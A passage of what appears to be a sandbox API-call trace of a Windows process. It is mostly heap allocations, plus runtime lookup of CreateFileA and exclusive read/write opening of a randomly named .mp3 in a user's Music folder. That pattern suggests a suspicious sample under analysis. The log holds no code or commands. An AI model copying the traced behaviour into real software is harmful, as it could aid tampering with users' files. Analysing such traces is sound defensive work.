(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.613] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0038.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ce38 [0038.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ce38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0038.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.613] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0038.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0038.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce38 [0038.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ce38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0038.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.614] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0038.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0038.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0038.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0038.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0038.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x35) returned 0x7c2080 [0038.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3", cchWideChar=53, lpMultiByteStr=0x7c2080, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3", lpUsedDefaultChar=0x0) returned 53 [0038.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0038.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0038.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.615] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xajmo5bmfrmn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0038.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0038.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0038.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=53, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6a) returned 0x7db300 [0038.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=53, lpWideCharStr=0x7db300, cchWideChar=53 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\XajMo5BmFRMN.mp3") returned 53 [0038.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0038.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0038.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.616] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0038.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0038.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0038.617] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.617] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0038.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0038.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.618] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0038.618] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0038.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0038.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0038.619] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0038.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0038.619] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0038.619] RtlAllocateHeap 